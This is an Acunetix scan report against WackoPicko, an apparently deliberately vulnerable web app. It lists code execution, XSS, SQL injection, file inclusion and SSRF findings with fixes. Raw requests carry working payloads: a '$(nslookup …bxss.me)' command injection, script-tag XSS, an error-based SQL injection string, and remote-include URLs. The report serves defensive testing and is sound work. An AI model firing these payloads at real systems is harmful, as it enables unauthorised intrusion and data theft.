
Developer Report
Acunetix Security Audit
09 June 2020
Generated by Acunetix
Selected vulnerabilities
Scan details
Scan information
Start url http://192.168.1.124/WackoPicko/
Host http://192.168.1.124/

Threat level

Acunetix Threat Level 3

One or more high-severity vulnerabilities have been discovered by the scanner. A malicious user can exploit these
vulnerabilities and compromise the backend database and/or deface your website.

Alerts distribution

Total alerts found: 11
High: 11
Medium: 0
Low: 0
Informational: 0
Alerts summary

Code execution

Classification
CVSS2
Base Score: 6.8
Access Vector: Network_accessible
Access Complexity: Medium
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: Partial
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CVSS3
Base Score: 9.1
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality Impact: High
Integrity Impact: High
Availability Impact: None
CWE: CWE-94
Affected items (variations)
/WackoPicko/passcheck.php: 1

Cross site scripting

Classification
CVSS2
Base Score: 6.4
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: None
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CVSS3
Base Score: 5.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: Low
Availability Impact: None
CWE: CWE-79
Affected items (variations)
/WackoPicko/guestbook.php: 1
/WackoPicko/pictures/search.php: 1
/WackoPicko/users/login.php: 1

File inclusion

Classification
CVSS2
Base Score: 7.5
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: Partial
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE: CWE-20
Affected items (variations)
/WackoPicko/admin/index.php: 2

Remote file inclusion XSS

Classification
CVSS2
Base Score: 6.4
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: None
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CVSS3
Base Score: 5.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: Low
Availability Impact: None
CWE: CWE-79
Affected items (variations)
/WackoPicko/admin/index.php: 2

SQL injection

Classification
CVSS2
Base Score: 6.8
Access Vector: Network_accessible
Access Complexity: Medium
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: Partial
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CVSS3
Base Score: 10.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Changed
Confidentiality Impact: High
Integrity Impact: High
Availability Impact: None
CWE: CWE-89
Affected items (variations)
/WackoPicko/users/login.php: 1

Server side request forgery

Classification
CVSS2
Base Score: 5.8
Access Vector: Network_accessible
Access Complexity: Medium
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: None
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CVSS3
Base Score: 9.0
Attack Vector: Network
Attack Complexity: High
Privileges Required: None
User Interaction: None
Scope: Changed
Confidentiality Impact: High
Integrity Impact: High
Availability Impact: High
CWE: CWE-918
Affected items (variations)
/WackoPicko/admin/index.php: 2

Alerts details

Code execution

Severity High
Reported by module /Scripts/PerScheme/Code_Execution.script

Description

This script is possibly vulnerable to code execution attacks.

Code injection vulnerabilities occur where the output or content served from a web application can be manipulated in such
a way that it triggers server-side code execution. In some poorly written web applications that allow users to modify server-
side files (such as by posting to a message board or guestbook), it is sometimes possible to inject code in the scripting
language of the application itself.

Impact

A malicious user may execute arbitrary system commands with the permissions of the web server.

Recommendation

Your script should filter metacharacters from user input. Better still, avoid passing user input to a shell or to eval-style
functions at all, and validate the value against an allow-list of what the script actually expects.

References

Security Focus - Penetration Testing for Web Applications (Part Two)
(http://www.symantec.com/connect/articles/penetration-testing-web-applications-part-two)
OWASP PHP Top 5 (http://www.owasp.org/index.php/PHP_Top_5)

Affected items

/WackoPicko/passcheck.php
Details
URL encoded POST input password was set to $(nslookup hitcHBX8q1QN7f0d6f.bxss.me)

Possible execution result:

The bxss.me domain hitcHBX8q1QN7f0d6f.bxss.me was resolved.

Request headers
POST /WackoPicko/passcheck.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 51
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
password=%24(nslookup%20hitcHBX8q1QN7f0d6f.bxss.me)

Cross site scripting

Severity High
Reported by module /Scripts/PerScheme/XSS.script

Description

Cross-site Scripting (XSS) refers to a client-side code injection attack in which an attacker can execute malicious scripts in
a legitimate website or web application. XSS occurs when a web application makes use of unvalidated or unencoded user
input within the output it generates.

Impact

Malicious JavaScript has access to all the same objects as the rest of the web page, including access to cookies and local
storage, which are often used to store session tokens. If an attacker can obtain a user's session cookie, they can then
impersonate that user.

Furthermore, JavaScript can read and make arbitrary modifications to the contents of a page being displayed to a user.
Therefore, XSS in conjunction with some clever social engineering opens up a lot of possibilities for an attacker.

Recommendation

Apply context-dependent encoding and/or validation to user input rendered on a page.

References

Cross-site Scripting (XSS) Attack - Acunetix (https://www.acunetix.com/websitesecurity/cross-site-scripting/)
Types of XSS - Acunetix (https://www.acunetix.com/websitesecurity/xss/)
Cross-site Scripting - OWASP (http://www.owasp.org/index.php/Cross_Site_Scripting)
XSS Filter Evasion Cheat Sheet (https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
Excess XSS, a comprehensive tutorial on cross-site scripting (https://excess-xss.com/)
Cross site scripting (http://en.wikipedia.org/wiki/Cross-site_scripting)

Affected items

/WackoPicko/guestbook.php
Verified vulnerability
Details
URL encoded POST input comment was set to 555'"()&%<acx><ScRiPt >EVua(9983)</ScRiPt>
Request headers
POST /WackoPicko/guestbook.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.1.124/WackoPicko/
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 70
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
comment=555'"()%26%25<acx><ScRiPt%20>EVua(9983)</ScRiPt>&name=UHOdllxh
/WackoPicko/pictures/search.php
Verified vulnerability
Details
URL encoded GET input query was set to 1'"()&%<acx><ScRiPt >wU91(9983)</ScRiPt>
Request headers
GET /WackoPicko/pictures/search.php?query=1'"()%26%25<acx><ScRiPt%20>wU91(9983)</ScRiPt> HTTP/1.1
Referer: http://192.168.1.124/WackoPicko/
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
/WackoPicko/users/login.php
Verified vulnerability
Details
URL encoded POST input username was set to UHOdllxh'"()&%<acx><ScRiPt >XCbr(9711)</ScRiPt>
Request headers
POST /WackoPicko/users/login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.1.124/WackoPicko/
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 88
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
password=g00dPa%24%24w0rD&username=UHOdllxh'"()%26%25<acx><ScRiPt%20>XCbr(9711)</ScRiPt>

File inclusion

Severity High
Reported by module /Scripts/PerScheme/File_Inclusion.script

Description

This script is possibly vulnerable to file inclusion attacks.

It seems that this script includes a file whose name is determined using user-supplied data. This data is not properly
validated before being passed to the include function.

Impact

It is possible for a remote attacker to include a file from local or remote resources and/or execute arbitrary script code with
the privileges of the web server.

Recommendation

Edit the source code to ensure that input is properly validated. Where possible, it is recommended to make a list of
accepted filenames and restrict the input to that list.

For PHP, the option allow_url_fopen would normally allow a programmer to open, include or otherwise use a remote file
using a URL rather than a local file path. It is recommended to disable this option in php.ini. Note that since PHP 5.2,
include and require of URLs are separately controlled by allow_url_include, which should also remain disabled.

References

PHP - Using remote files (http://www.php.net/manual/en/features.remote-files.php)
OWASP PHP Top 5 (http://www.owasp.org/index.php/PHP_Top_5)
Remote file inclusion (http://en.wikipedia.org/wiki/Remote_file_inclusion)

Affected items

/WackoPicko/admin/index.php
Details
URL encoded GET input page was set to http://bxss.me/t/fit.txt%3F.jpg

Pattern found:

63c19a6da79816b21429e5bb262daed863c19a6da79816b21429e5bb262daed8

Request headers
POST /WackoPicko/admin/index.php?page=http://bxss.me/t/fit.txt%3F.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.1.124/WackoPicko/
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 41
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
adminname=g00dPa%24%24w0rD&password=login
/WackoPicko/admin/index.php
Details
URL encoded GET input page was set to http://bxss.me/t/fit.txt%3F.jpg

Pattern found:

63c19a6da79816b21429e5bb262daed863c19a6da79816b21429e5bb262daed8

Request headers
GET /WackoPicko/admin/index.php?page=http://bxss.me/t/fit.txt%3F.jpg HTTP/1.1
Referer: http://192.168.1.124/WackoPicko/
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remote file inclusion XSS

Severity High
Reported by module /Scripts/PerScheme/Remote_File_Inclusion_XSS.script

Description

This script is possibly vulnerable to Cross Site Scripting (XSS) attacks.

Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the
form of JavaScript) to another user. In this case the server opens arbitrary URLs and puts the content retrieved from the
URL into the response without filtering.

Impact

Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in
order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the
user. It is also possible to modify the content of the page presented to the user.

Recommendation

Your server-side code should verify that the URL supplied by the user is allowed to be retrieved and displayed, or filter the
response from the URL according to the context in which it is displayed.

References

Acunetix Cross Site Scripting Attack (http://www.acunetix.com/websitesecurity/cross-site-scripting.htm)
VIDEO: How Cross-Site Scripting (XSS) Works (http://www.acunetix.com/blog/web-security-zone/video-how-cross-site-scripting-xss-works/)
The Cross Site Scripting Faq (http://www.cgisecurity.com/xss-faq.html)
OWASP Cross Site Scripting (http://www.owasp.org/index.php/Cross_Site_Scripting)
XSS Filter Evasion Cheat Sheet (https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
Cross site scripting (http://en.wikipedia.org/wiki/Cross-site_scripting)
OWASP PHP Top 5 (http://www.owasp.org/index.php/PHP_Top_5)
How To: Prevent Cross-Site Scripting in ASP.NET (http://msdn.microsoft.com/en-us/library/ms998274.aspx)

Affected items

/WackoPicko/admin/index.php
Details
URL encoded GET input page was set to HttP://bxss.me/t/xss.html?%00
Request headers
POST /WackoPicko/admin/index.php?page=HttP://bxss.me/t/xss.html%3F%2500 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 41
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
adminname=g00dPa%24%24w0rD&password=login
/WackoPicko/admin/index.php
Details
URL encoded GET input page was set to HttP://bxss.me/t/xss.html?%00
Request headers
GET /WackoPicko/admin/index.php?page=HttP://bxss.me/t/xss.html%3F%2500 HTTP/1.1
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

SQL injection

Severity High
Reported by module /Scripts/PerScheme/Sql_Injection.script

Description

SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements that control a
web application's database server.

Impact

An attacker can use SQL injection to bypass a web application's authentication and authorization mechanisms and
retrieve the contents of an entire database. SQLi can also be used to add, modify and delete records in a database,
affecting data integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands,
which may then be used to escalate an attack even further.

Recommendation

Use parameterized queries for any SQL query that contains user input. Parameterized queries allow the
database to understand which parts of the SQL query should be treated as user input, which prevents SQL injection.

References

SQL Injection (SQLi) - Acunetix (https://www.acunetix.com/websitesecurity/sql-injection/)
Types of SQL Injection (SQLi) - Acunetix (https://www.acunetix.com/websitesecurity/sql-injection2/)
Prevent SQL injection vulnerabilities in PHP applications and fix them - Acunetix
(https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/)
SQL Injection - OWASP (https://www.owasp.org/index.php/SQL_Injection)
Bobby Tables: A guide to preventing SQL injection (http://bobby-tables.com/)
SQL Injection Cheat Sheets - Pentestmonkey (http://pentestmonkey.net/category/cheat-sheet/sql-injection)

Affected items

/WackoPicko/users/login.php
Verified vulnerability
Details
URL encoded POST input username was set to 'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(81),CHAR(57),CHAR(67),CHAR(121),CHAR(52),CHAR(79),CHAR(50),CHAR(69)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

Injected pattern found:

4CuQ9Cy4O2E

Request headers
POST /WackoPicko/users/login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 355
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
password=g00dPa%24%24w0rD&username='and(select%201%20from(select%20count(*)%2Cconcat((select%20concat(CHAR(52)%2CCHAR(67)%2CCHAR(117)%2CCHAR(81)%2CCHAR(57)%2CCHAR(67)%2CCHAR(121)%2CCHAR(52)%2CCHAR(79)%2CCHAR(50)%2CCHAR(69))%20from%20information_schema.tables%20limit%200%2C1)%2Cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'

Server side request forgery

Severity High
Reported by module /Scripts/PerScheme/Server_Side_Request_Forgery.script

Description

SSRF (Server Side Request Forgery) is a vulnerability that allows an attacker to force server interfaces to send packets,
initiated by the victim server, to the local interface or to another server behind the firewall. Consult the Web References
for more information about this problem.

Impact

The impact varies according to the affected server interface.

Recommendation

Your script should properly sanitize user input.

References

SSRF VS. BUSINESS-CRITICAL APPLICATIONS (https://media.blackhat.com/bh-us-12/Briefings/Polyakov/BH_US_12_Polyakov_SSRF_Business_Slides.pdf)

Affected items

/WackoPicko/admin/index.php
Details
URL encoded GET input page was set to http://hitm1YRhASIND.bxss.me/

An HTTP request was initiated for the domain hitm1YRhASIND.bxss.me which indicates that this script is vulnerable to
SSRF.

HTTP request details:

IP address: 179.8.237.20
User agent:

Request headers
POST /WackoPicko/admin/index.php?page=http://hitm1YRhASIND.bxss.me/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 41
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
adminname=g00dPa%24%24w0rD&password=login
/WackoPicko/admin/index.php
Details
URL encoded GET input page was set to http://hitYWkgofMX4F.bxss.me/

An HTTP request was initiated for the domain hitYWkgofMX4F.bxss.me which indicates that this script is vulnerable to
SSRF.

HTTP request details:

IP address: 179.8.237.20
User agent:

Request headers
GET /WackoPicko/admin/index.php?page=http://hitYWkgofMX4F.bxss.me/ HTTP/1.1
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Scanned items (coverage report)
http://192.168.1.124/WackoPicko/admin/index.php
http://192.168.1.124/WackoPicko/guestbook.php
http://192.168.1.124/WackoPicko/passcheck.php
http://192.168.1.124/WackoPicko/pictures/search.php
http://192.168.1.124/WackoPicko/users/login.php
